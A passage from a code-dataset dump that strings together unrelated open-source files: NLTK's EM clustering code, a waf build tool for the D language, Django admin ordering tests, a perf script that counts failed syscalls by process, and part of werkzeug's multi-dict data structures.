[ numpy.identity(dimensions, numpy.float64)
for i in range(self._num_clusters) ]
# do the E and M steps until the likelihood plateaus
lastl = self._loglikelihood(vectors, priors, means, covariances)
converged = False
while not converged:
if trace: print('iteration; loglikelihood', lastl)
# E-step, calculate hidden variables, h[i,j]
h = numpy.zeros((len(vectors), self._num_clusters),
numpy.float64)
for i in range(len(vectors)):
for j in range(self._num_clusters):
h[i,j] = priors[j] * self._gaussian(means[j],
covariances[j], vectors[i])
h[i,:] /= sum(h[i,:])
# M-step, update parameters - cvm, p, mean
for j in range(self._num_clusters):
covariance_before = covariances[j]
new_covariance = numpy.zeros((dimensions, dimensions),
numpy.float64)
new_mean = numpy.zeros(dimensions, numpy.float64)
sum_hj = 0.0
for i in range(len(vectors)):
delta = vectors[i] - means[j]
new_covariance += h[i,j] * \
numpy.multiply.outer(delta, delta)
sum_hj += h[i,j]
new_mean += h[i,j] * vectors[i]
covariances[j] = new_covariance / sum_hj
means[j] = new_mean / sum_hj
priors[j] = sum_hj / len(vectors)
# bias term to stop covariance matrix being singular
covariances[j] += self._bias * \
numpy.identity(dimensions, numpy.float64)
# calculate likelihood - FIXME: may be broken
l = self._loglikelihood(vectors, priors, means, covariances)
# check for convergence
if abs(lastl - l) < self._conv_threshold:
converged = True
lastl = l
def classify_vectorspace(self, vector):
best = None
for j in range(self._num_clusters):
p = self._priors[j] * self._gaussian(self._means[j],
self._covariance_matrices[j], vector)
if not best or p > best[0]:
best = (p, j)
return best[1]
def likelihood_vectorspace(self, vector, cluster):
cid = self.cluster_names().index(cluster)
        return self._priors[cid] * self._gaussian(self._means[cid],
            self._covariance_matrices[cid], vector)
def _gaussian(self, mean, cvm, x):
m = len(mean)
assert cvm.shape == (m, m), \
'bad sized covariance matrix, %s' % str(cvm.shape)
try:
det = numpy.linalg.det(cvm)
inv = numpy.linalg.inv(cvm)
a = det ** -0.5 * (2 * numpy.pi) ** (-m / 2.0)
dx = x - mean
b = -0.5 * numpy.dot( numpy.dot(dx, inv), dx)
return a * numpy.exp(b)
except OverflowError:
# happens when the exponent is negative infinity - i.e. b = 0
# i.e. the inverse of cvm is huge (cvm is almost zero)
return 0
def _loglikelihood(self, vectors, priors, means, covariances):
llh = 0.0
for vector in vectors:
p = 0
for j in range(len(priors)):
p += priors[j] * \
self._gaussian(means[j], covariances[j], vector)
llh += numpy.log(p)
return llh
def __repr__(self):
return '<EMClusterer means=%s>' % list(self._means)
def demo():
"""
Non-interactive demonstration of the clusterers with simple 2-D data.
"""
from nltk import cluster
# example from figure 14.10, page 519, Manning and Schutze
vectors = [numpy.array(f) for f in [[0.5, 0.5], [1.5, 0.5], [1, 3]]]
means = [[4, 2], [4, 2.01]]
clusterer = cluster.EMClusterer(means, bias=0.1)
clusters = clusterer.cluster(vectors, True, trace=True)
print('Clustered:', vectors)
print('As: ', clusters)
print()
for c in range(2):
print('Cluster:', c)
print('Prior: ', clusterer._priors[c])
print('Mean: ', clusterer._means[c])
print('Covar: ', clusterer._covariance_matrices[c])
print()
# classify a new vector
vector = numpy.array([2, 2])
print('classify(%s):' % vector, end=' ')
print(clusterer.classify(vector))
# show the classification probabilities
vector = numpy.array([2, 2])
print('classification_probdist(%s):' % vector)
pdist = clusterer.classification_probdist(vector)
for sample in pdist.samples():
print('%s => %.0f%%' % (sample,
pdist.prob(sample) *100))
#
# The following demo code is broken.
#
# # use a set of tokens with 2D indices
# vectors = [numpy.array(f) for f in [[3, 3], [1, 2], [4, 2], [4, 0], [2, 3], [3, 1]]]
# # test the EM clusterer with means given by k-means (2) and
# # dimensionality reduction
# clusterer = cluster.KMeans(2, euclidean_distance, svd_dimensions=1)
# print 'Clusterer:', clusterer
# clusters = clusterer.cluster(vectors)
# means = clusterer.means()
# print 'Means:', clusterer.means()
# print
# clusterer = cluster.EMClusterer(means, svd_dimensions=1)
# clusters = clusterer.cluster(vectors, True)
# print 'Clusterer:', clusterer
# print 'Clustered:', str(vectors)[:60], '...'
# print 'As:', str(clusters)[:60], '...'
# print
# # classify a new vector
# vector = numpy.array([3, 3])
# print 'classify(%s):' % vector,
# print clusterer.classify(vector)
# print
# # show the classification probabilities
# vector = numpy.array([2.2, 2])
# print 'classification_probdist(%s)' % vector
# pdist = clusterer.classification_probdist(vector)
# for sample in pdist:
# print '%s => %.0f%%' % (sample, pdist.prob(sample) *100)
if __name__ == '__main__':
demo()
| apache-2.0 |
lanfker/tdma_imac | .waf-1.6.7-0a94702c61504c487a251b8d0a04ca9a/waflib/Tools/d.py | 4 | 1957 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/svn/docs/wafbook/single.html#_obtaining_the_waf_file
import os,sys
from waflib import Utils,Task,Errors
from waflib.TaskGen import taskgen_method,feature,after_method,before_method,extension
from waflib.Configure import conf
from waflib.Tools.ccroot import link_task
from waflib.Tools import d_scan,d_config
from waflib.Tools.ccroot import link_task,stlink_task
class d(Task.Task):
color='GREEN'
run_str='${D} ${DFLAGS} ${DINC_ST:INCPATHS} ${D_SRC_F:SRC} ${D_TGT_F:TGT}'
scan=d_scan.scan
class d_with_header(d):
run_str='${D} ${DFLAGS} ${DINC_ST:INCPATHS} ${D_HDR_F:tgt.outputs[1].bldpath()} ${D_SRC_F:SRC} ${D_TGT_F:tgt.outputs[0].bldpath()}'
class d_header(Task.Task):
color='BLUE'
run_str='${D} ${D_HEADER} ${SRC}'
class dprogram(link_task):
run_str='${D_LINKER} ${DLNK_SRC_F}${SRC} ${DLNK_TGT_F:TGT} ${RPATH_ST:RPATH} ${DSTLIB_MARKER} ${DSTLIBPATH_ST:STLIBPATH} ${DSTLIB_ST:STLIB} ${DSHLIB_MARKER} ${LIBPATH_ST:LIBPATH} ${DSHLIB_ST:LIB} ${LINKFLAGS}'
inst_to='${BINDIR}'
chmod=Utils.O755
class dshlib(dprogram):
inst_to='${LIBDIR}'
class dstlib(stlink_task):
pass
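# A rough wscript sketch of how these classes are normally driven.  This is
# illustrative only: the tool/feature names and file names below are
# assumptions about a typical waf project, not something defined in this file.
#
#   def configure(conf):
#       conf.load('compiler_d')
#
#   def build(bld):
#       bld(features='d dprogram', source='main.d', target='app')
#
# A task generator carrying the 'd' feature runs d_hook/process_header below
# for each .d source, and the dprogram/dshlib/dstlib classes provide the
# final link step.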
def d_hook(self,node):
if getattr(self,'generate_headers',None):
task=self.create_compiled_task('d_with_header',node)
header_node=node.change_ext(self.env['DHEADER_ext'])
task.outputs.append(header_node)
else:
task=self.create_compiled_task('d',node)
return task
def generate_header(self,filename,install_path=None):
try:
self.header_lst.append([filename,install_path])
except AttributeError:
self.header_lst=[[filename,install_path]]
def process_header(self):
for i in getattr(self,'header_lst',[]):
node=self.path.find_resource(i[0])
if not node:
raise Errors.WafError('file %r not found on d obj'%i[0])
self.create_task('d_header',node,node.change_ext('.di'))
extension('.d','.di','.D')(d_hook)
taskgen_method(generate_header)
feature('d')(process_header) | gpl-2.0 |
andersonresende/django | tests/admin_ordering/tests.py | 37 | 6765 | from __future__ import unicode_literals
from django.contrib import admin
from django.contrib.admin.options import ModelAdmin
from django.contrib.auth.models import User
from django.test import TestCase, RequestFactory
from .models import (Band, Song, SongInlineDefaultOrdering,
SongInlineNewOrdering, DynOrderingBandAdmin)
class MockRequest(object):
pass
class MockSuperUser(object):
def has_perm(self, perm):
return True
def has_module_perms(self, module):
return True
request = MockRequest()
request.user = MockSuperUser()
class TestAdminOrdering(TestCase):
"""
Let's make sure that ModelAdmin.get_queryset uses the ordering we define
    in ModelAdmin rather than the ordering defined in the model's inner Meta
class.
"""
def setUp(self):
self.request_factory = RequestFactory()
Band.objects.bulk_create([
Band(name='Aerosmith', bio='', rank=3),
Band(name='Radiohead', bio='', rank=1),
Band(name='Van Halen', bio='', rank=2),
])
def test_default_ordering(self):
"""
The default ordering should be by name, as specified in the inner Meta
class.
"""
ma = ModelAdmin(Band, admin.site)
names = [b.name for b in ma.get_queryset(request)]
self.assertListEqual(['Aerosmith', 'Radiohead', 'Van Halen'], names)
def test_specified_ordering(self):
"""
Let's use a custom ModelAdmin that changes the ordering, and make sure
it actually changes.
"""
class BandAdmin(ModelAdmin):
ordering = ('rank',) # default ordering is ('name',)
ma = BandAdmin(Band, admin.site)
names = [b.name for b in ma.get_queryset(request)]
self.assertListEqual(['Radiohead', 'Van Halen', 'Aerosmith'], names)
def test_dynamic_ordering(self):
"""
Let's use a custom ModelAdmin that changes the ordering dynamically.
"""
super_user = User.objects.create(username='admin', is_superuser=True)
other_user = User.objects.create(username='other')
request = self.request_factory.get('/')
request.user = super_user
ma = DynOrderingBandAdmin(Band, admin.site)
names = [b.name for b in ma.get_queryset(request)]
self.assertListEqual(['Radiohead', 'Van Halen', 'Aerosmith'], names)
request.user = other_user
names = [b.name for b in ma.get_queryset(request)]
self.assertListEqual(['Aerosmith', 'Radiohead', 'Van Halen'], names)
class TestInlineModelAdminOrdering(TestCase):
"""
Let's make sure that InlineModelAdmin.get_queryset uses the ordering we
define in InlineModelAdmin.
"""
def setUp(self):
self.band = Band.objects.create(name='Aerosmith', bio='', rank=3)
Song.objects.bulk_create([
Song(band=self.band, name='Pink', duration=235),
Song(band=self.band, name='Dude (Looks Like a Lady)', duration=264),
Song(band=self.band, name='Jaded', duration=214),
])
def test_default_ordering(self):
"""
The default ordering should be by name, as specified in the inner Meta
class.
"""
inline = SongInlineDefaultOrdering(self.band, admin.site)
names = [s.name for s in inline.get_queryset(request)]
self.assertListEqual(['Dude (Looks Like a Lady)', 'Jaded', 'Pink'], names)
def test_specified_ordering(self):
"""
Let's check with ordering set to something different than the default.
"""
inline = SongInlineNewOrdering(self.band, admin.site)
names = [s.name for s in inline.get_queryset(request)]
self.assertListEqual(['Jaded', 'Pink', 'Dude (Looks Like a Lady)'], names)
class TestRelatedFieldsAdminOrdering(TestCase):
def setUp(self):
self.b1 = Band.objects.create(name='Pink Floyd', bio='', rank=1)
self.b2 = Band.objects.create(name='Foo Fighters', bio='', rank=5)
# we need to register a custom ModelAdmin (instead of just using
# ModelAdmin) because the field creator tries to find the ModelAdmin
# for the related model
class SongAdmin(admin.ModelAdmin):
pass
admin.site.register(Song, SongAdmin)
def tearDown(self):
admin.site.unregister(Song)
if Band in admin.site._registry:
admin.site.unregister(Band)
def check_ordering_of_field_choices(self, correct_ordering):
fk_field = admin.site._registry[Song].formfield_for_foreignkey(Song.band.field)
m2m_field = admin.site._registry[Song].formfield_for_manytomany(Song.other_interpreters.field)
self.assertListEqual(list(fk_field.queryset), correct_ordering)
self.assertListEqual(list(m2m_field.queryset), correct_ordering)
def test_no_admin_fallback_to_model_ordering(self):
# should be ordered by name (as defined by the model)
self.check_ordering_of_field_choices([self.b2, self.b1])
def test_admin_with_no_ordering_fallback_to_model_ordering(self):
class NoOrderingBandAdmin(admin.ModelAdmin):
pass
admin.site.register(Band, NoOrderingBandAdmin)
# should be ordered by name (as defined by the model)
self.check_ordering_of_field_choices([self.b2, self.b1])
def test_admin_ordering_beats_model_ordering(self):
class StaticOrderingBandAdmin(admin.ModelAdmin):
ordering = ('rank',)
admin.site.register(Band, StaticOrderingBandAdmin)
# should be ordered by rank (defined by the ModelAdmin)
self.check_ordering_of_field_choices([self.b1, self.b2])
    def test_custom_queryset_still_wins(self):
        """Test that a custom queryset still takes precedence (#21405)"""
class SongAdmin(admin.ModelAdmin):
# Exclude one of the two Bands from the querysets
def formfield_for_foreignkey(self, db_field, **kwargs):
if db_field.name == 'band':
kwargs["queryset"] = Band.objects.filter(rank__gt=2)
return super(SongAdmin, self).formfield_for_foreignkey(db_field, **kwargs)
def formfield_for_manytomany(self, db_field, **kwargs):
if db_field.name == 'other_interpreters':
kwargs["queryset"] = Band.objects.filter(rank__gt=2)
                return super(SongAdmin, self).formfield_for_manytomany(db_field, **kwargs)
class StaticOrderingBandAdmin(admin.ModelAdmin):
ordering = ('rank',)
admin.site.unregister(Song)
admin.site.register(Song, SongAdmin)
admin.site.register(Band, StaticOrderingBandAdmin)
self.check_ordering_of_field_choices([self.b2])
| bsd-3-clause |
bugralevent/linux | tools/perf/scripts/python/failed-syscalls-by-pid.py | 1996 | 2233 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s failed-syscalls-by-pid.py [comm|pid]\n"
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
raw_syscalls__sys_exit(**locals())
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
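# Typical invocation (the record step below is an assumption based on the
# matching *-record wrapper scripts shipped with perf; adjust as needed):
#   perf record -e raw_syscalls:sys_exit -a -- sleep 10
#   perf script -s failed-syscalls-by-pid.py [comm|pid]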
| gpl-2.0 |
GeekTrainer/Flask | Work/TriviaMVA/TriviaMVA/env/Lib/site-packages/werkzeug/datastructures.py | 146 | 86337 | # -*- coding: utf-8 -*-
"""
werkzeug.datastructures
~~~~~~~~~~~~~~~~~~~~~~~
This module provides mixins and classes with an immutable interface.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import re
import sys
import codecs
import mimetypes
from copy import deepcopy
from itertools import repeat
from werkzeug._internal import _missing, _empty_stream
from werkzeug._compat import iterkeys, itervalues, iteritems, iterlists, \
PY2, text_type, integer_types, string_types, make_literal_wrapper, \
to_native
_locale_delim_re = re.compile(r'[_-]')
def is_immutable(self):
raise TypeError('%r objects are immutable' % self.__class__.__name__)
def iter_multi_items(mapping):
"""Iterates over the items of a mapping yielding keys and values
without dropping any from more complex structures.
"""
if isinstance(mapping, MultiDict):
for item in iteritems(mapping, multi=True):
yield item
elif isinstance(mapping, dict):
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
for value in value:
yield key, value
else:
yield key, value
else:
for item in mapping:
yield item
def native_itermethods(names):
if not PY2:
return lambda x: x
def setmethod(cls, name):
itermethod = getattr(cls, name)
setattr(cls, 'iter%s' % name, itermethod)
listmethod = lambda self, *a, **kw: list(itermethod(self, *a, **kw))
listmethod.__doc__ = \
'Like :py:meth:`iter%s`, but returns a list.' % name
setattr(cls, name, listmethod)
def wrap(cls):
for name in names:
setmethod(cls, name)
return cls
return wrap
class ImmutableListMixin(object):
"""Makes a :class:`list` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(tuple(self))
return rv
def __reduce_ex__(self, protocol):
return type(self), (list(self),)
def __delitem__(self, key):
is_immutable(self)
def __delslice__(self, i, j):
is_immutable(self)
def __iadd__(self, other):
is_immutable(self)
__imul__ = __iadd__
def __setitem__(self, key, value):
is_immutable(self)
def __setslice__(self, i, j, value):
is_immutable(self)
def append(self, item):
is_immutable(self)
remove = append
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def reverse(self):
is_immutable(self)
def sort(self, cmp=None, key=None, reverse=None):
is_immutable(self)
class ImmutableList(ImmutableListMixin, list):
"""An immutable :class:`list`.
.. versionadded:: 0.5
:private:
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
class ImmutableDictMixin(object):
"""Makes a :class:`dict` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
@classmethod
def fromkeys(cls, keys, value=None):
instance = super(cls, cls).__new__(cls)
instance.__init__(zip(keys, repeat(value)))
return instance
def __reduce_ex__(self, protocol):
return type(self), (dict(self),)
def _iter_hashitems(self):
return iteritems(self)
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(frozenset(self._iter_hashitems()))
return rv
def setdefault(self, key, default=None):
is_immutable(self)
def update(self, *args, **kwargs):
is_immutable(self)
def pop(self, key, default=None):
is_immutable(self)
def popitem(self):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
def __delitem__(self, key):
is_immutable(self)
def clear(self):
is_immutable(self)
class ImmutableMultiDictMixin(ImmutableDictMixin):
"""Makes a :class:`MultiDict` immutable.
.. versionadded:: 0.5
:private:
"""
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def _iter_hashitems(self):
return iteritems(self, multi=True)
def add(self, key, value):
is_immutable(self)
def popitemlist(self):
is_immutable(self)
def poplist(self, key):
is_immutable(self)
def setlist(self, key, new_list):
is_immutable(self)
def setlistdefault(self, key, default_list=None):
is_immutable(self)
class UpdateDictMixin(object):
"""Makes dicts call `self.on_update` on modifications.
.. versionadded:: 0.5
:private:
"""
on_update = None
def calls_update(name):
def oncall(self, *args, **kw):
rv = getattr(super(UpdateDictMixin, self), name)(*args, **kw)
if self.on_update is not None:
self.on_update(self)
return rv
oncall.__name__ = name
return oncall
def setdefault(self, key, default=None):
modified = key not in self
rv = super(UpdateDictMixin, self).setdefault(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
def pop(self, key, default=_missing):
modified = key in self
if default is _missing:
rv = super(UpdateDictMixin, self).pop(key)
else:
rv = super(UpdateDictMixin, self).pop(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
__setitem__ = calls_update('__setitem__')
__delitem__ = calls_update('__delitem__')
clear = calls_update('clear')
popitem = calls_update('popitem')
update = calls_update('update')
del calls_update
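# A minimal sketch of how this mixin is combined with a dict subclass (the
# names here are illustrative; CallbackDict further below is the in-module
# user of this pattern):
#
#   class TrackedDict(UpdateDictMixin, dict):
#       pass
#
#   def changed(mapping):
#       print(dict(mapping))
#
#   d = TrackedDict()
#   d.on_update = changed
#   d['a'] = 1        # __setitem__ is wrapped, so changed(d) fires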
class TypeConversionDict(dict):
"""Works like a regular dict but the :meth:`get` method can perform
type conversions. :class:`MultiDict` and :class:`CombinedMultiDict`
are subclasses of this class and provide the same feature.
.. versionadded:: 0.5
"""
def get(self, key, default=None, type=None):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = TypeConversionDict(foo='42', bar='blub')
>>> d.get('foo', type=int)
42
>>> d.get('bar', -1, type=int)
-1
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
"""
try:
rv = self[key]
if type is not None:
rv = type(rv)
except (KeyError, ValueError):
rv = default
return rv
class ImmutableTypeConversionDict(ImmutableDictMixin, TypeConversionDict):
"""Works like a :class:`TypeConversionDict` but does not support
modifications.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return TypeConversionDict(self)
def __copy__(self):
return self
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class MultiDict(TypeConversionDict):
"""A :class:`MultiDict` is a dictionary subclass customized to deal with
multiple values for the same key which is for example used by the parsing
functions in the wrappers. This is necessary because some HTML form
elements pass multiple values for the same key.
:class:`MultiDict` implements all standard dictionary methods.
Internally, it saves all values for a key as a list, but the standard dict
access methods will only return the first value for a key. If you want to
gain access to the other values, too, you have to use the `list` methods as
explained below.
Basic Usage:
>>> d = MultiDict([('a', 'b'), ('a', 'c')])
>>> d
MultiDict([('a', 'b'), ('a', 'c')])
>>> d['a']
'b'
>>> d.getlist('a')
['b', 'c']
>>> 'a' in d
True
It behaves like a normal dict thus all dict functions will only return the
first value when multiple values for one key are found.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
A :class:`MultiDict` can be constructed from an iterable of
``(key, value)`` tuples, a dict, a :class:`MultiDict` or from Werkzeug 0.2
onwards some keyword parameters.
:param mapping: the initial value for the :class:`MultiDict`. Either a
regular dict, an iterable of ``(key, value)`` tuples
or `None`.
"""
def __init__(self, mapping=None):
if isinstance(mapping, MultiDict):
dict.__init__(self, ((k, l[:]) for k, l in iterlists(mapping)))
elif isinstance(mapping, dict):
tmp = {}
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
value = list(value)
else:
value = [value]
tmp[key] = value
dict.__init__(self, tmp)
else:
tmp = {}
for key, value in mapping or ():
tmp.setdefault(key, []).append(value)
dict.__init__(self, tmp)
def __getstate__(self):
return dict(self.lists())
def __setstate__(self, value):
dict.clear(self)
dict.update(self, value)
def __getitem__(self, key):
"""Return the first data value for this key;
raises KeyError if not found.
:param key: The key to be looked up.
:raise KeyError: if the key does not exist.
"""
if key in self:
return dict.__getitem__(self, key)[0]
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
"""Like :meth:`add` but removes an existing key first.
:param key: the key for the value.
:param value: the value to set.
"""
dict.__setitem__(self, key, [value])
def add(self, key, value):
"""Adds a new value for the key.
.. versionadded:: 0.6
:param key: the key for the value.
:param value: the value to add.
"""
dict.setdefault(self, key, []).append(value)
def getlist(self, key, type=None):
"""Return the list of items for a given key. If that key is not in the
`MultiDict`, the return value will be an empty list. Just as `get`
`getlist` accepts a `type` parameter. All items will be converted
with the callable defined there.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
"""
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return list(rv)
result = []
for item in rv:
try:
result.append(type(item))
except ValueError:
pass
return result
def setlist(self, key, new_list):
"""Remove the old values for a key and add new ones. Note that the list
you pass the values in will be shallow-copied before it is inserted in
the dictionary.
>>> d = MultiDict()
>>> d.setlist('foo', ['1', '2'])
>>> d['foo']
'1'
>>> d.getlist('foo')
['1', '2']
:param key: The key for which the values are set.
:param new_list: An iterable with the new values for the key. Old values
are removed first.
"""
dict.__setitem__(self, key, list(new_list))
def setdefault(self, key, default=None):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key not in self:
self[key] = default
else:
default = self[key]
return default
def setlistdefault(self, key, default_list=None):
"""Like `setdefault` but sets multiple values. The list returned
is not a copy, but the list that is actually used internally. This
means that you can put new values into the dict by appending items
to the list:
>>> d = MultiDict({"foo": 1})
>>> d.setlistdefault("foo").extend([2, 3])
>>> d.getlist("foo")
[1, 2, 3]
:param key: The key to be looked up.
:param default: An iterable of default values. It is either copied
(in case it was a list) or converted into a list
before returned.
:return: a :class:`list`
"""
if key not in self:
default_list = list(default_list or ())
dict.__setitem__(self, key, default_list)
else:
default_list = dict.__getitem__(self, key)
return default_list
def items(self, multi=False):
"""Return an iterator of ``(key, value)`` pairs.
:param multi: If set to `True` the iterator returned will have a pair
for each value of each key. Otherwise it will only
contain pairs for the first value of each key.
"""
for key, values in iteritems(dict, self):
if multi:
for value in values:
yield key, value
else:
yield key, values[0]
def lists(self):
"""Return a list of ``(key, values)`` pairs, where values is the list
of all values associated with the key."""
for key, values in iteritems(dict, self):
yield key, list(values)
def keys(self):
return iterkeys(dict, self)
__iter__ = keys
def values(self):
"""Returns an iterator of the first value on every key's value list."""
for values in itervalues(dict, self):
yield values[0]
def listvalues(self):
"""Return an iterator of all values associated with a key. Zipping
:meth:`keys` and this is the same as calling :meth:`lists`:
>>> d = MultiDict({"foo": [1, 2, 3]})
>>> zip(d.keys(), d.listvalues()) == d.lists()
True
"""
return itervalues(dict, self)
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self)
def deepcopy(self, memo=None):
"""Return a deep copy of this object."""
return self.__class__(deepcopy(self.to_dict(flat=False), memo))
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first value for each key.
:return: a :class:`dict`
"""
if flat:
return dict(iteritems(self))
return dict(self.lists())
def update(self, other_dict):
"""update() extends rather than replaces existing key lists."""
for key, value in iter_multi_items(other_dict):
MultiDict.add(self, key, value)
def pop(self, key, default=_missing):
"""Pop the first item for a list on the dict. Afterwards the
key is removed from the dict, so additional values are discarded:
>>> d = MultiDict({"foo": [1, 2, 3]})
>>> d.pop("foo")
1
>>> "foo" in d
False
:param key: the key to pop.
:param default: if provided the value to return if the key was
not in the dictionary.
"""
try:
return dict.pop(self, key)[0]
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
def popitem(self):
"""Pop an item from the dict."""
try:
item = dict.popitem(self)
return (item[0], item[1][0])
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def poplist(self, key):
"""Pop the list for a key from the dict. If the key is not in the dict
an empty list is returned.
.. versionchanged:: 0.5
If the key does no longer exist a list is returned instead of
raising an error.
"""
return dict.pop(self, key, [])
def popitemlist(self):
"""Pop a ``(key, list)`` tuple from the dict."""
try:
return dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def __copy__(self):
return self.copy()
def __deepcopy__(self, memo):
return self.deepcopy(memo=memo)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, list(iteritems(self, multi=True)))
class _omd_bucket(object):
"""Wraps values in the :class:`OrderedMultiDict`. This makes it
possible to keep an order over multiple different keys. It requires
a lot of extra memory and slows down access a lot, but makes it
possible to access elements in O(1) and iterate in O(n).
"""
__slots__ = ('prev', 'key', 'value', 'next')
def __init__(self, omd, key, value):
self.prev = omd._last_bucket
self.key = key
self.value = value
self.next = None
if omd._first_bucket is None:
omd._first_bucket = self
if omd._last_bucket is not None:
omd._last_bucket.next = self
omd._last_bucket = self
def unlink(self, omd):
if self.prev:
self.prev.next = self.next
if self.next:
self.next.prev = self.prev
if omd._first_bucket is self:
omd._first_bucket = self.next
if omd._last_bucket is self:
omd._last_bucket = self.prev
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class OrderedMultiDict(MultiDict):
"""Works like a regular :class:`MultiDict` but preserves the
order of the fields. To convert the ordered multi dict into a
list you can use the :meth:`items` method and pass it ``multi=True``.
In general an :class:`OrderedMultiDict` is an order of magnitude
slower than a :class:`MultiDict`.
.. admonition:: note
Due to a limitation in Python you cannot convert an ordered
multi dict into a regular dict by using ``dict(multidict)``.
Instead you have to use the :meth:`to_dict` method, otherwise
the internal bucket objects are exposed.
"""
def __init__(self, mapping=None):
dict.__init__(self)
self._first_bucket = self._last_bucket = None
if mapping is not None:
OrderedMultiDict.update(self, mapping)
def __eq__(self, other):
if not isinstance(other, MultiDict):
return NotImplemented
if isinstance(other, OrderedMultiDict):
iter1 = iteritems(self, multi=True)
iter2 = iteritems(other, multi=True)
try:
for k1, v1 in iter1:
k2, v2 = next(iter2)
if k1 != k2 or v1 != v2:
return False
except StopIteration:
return False
try:
next(iter2)
except StopIteration:
return True
return False
if len(self) != len(other):
return False
for key, values in iterlists(self):
if other.getlist(key) != values:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def __getstate__(self):
return list(iteritems(self, multi=True))
def __setstate__(self, values):
dict.clear(self)
for key, value in values:
self.add(key, value)
def __getitem__(self, key):
if key in self:
return dict.__getitem__(self, key)[0].value
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
self.poplist(key)
self.add(key, value)
def __delitem__(self, key):
self.pop(key)
def keys(self):
return (key for key, value in iteritems(self))
__iter__ = keys
def values(self):
return (value for key, value in iteritems(self))
def items(self, multi=False):
ptr = self._first_bucket
if multi:
while ptr is not None:
yield ptr.key, ptr.value
ptr = ptr.next
else:
returned_keys = set()
while ptr is not None:
if ptr.key not in returned_keys:
returned_keys.add(ptr.key)
yield ptr.key, ptr.value
ptr = ptr.next
def lists(self):
returned_keys = set()
ptr = self._first_bucket
while ptr is not None:
if ptr.key not in returned_keys:
yield ptr.key, self.getlist(ptr.key)
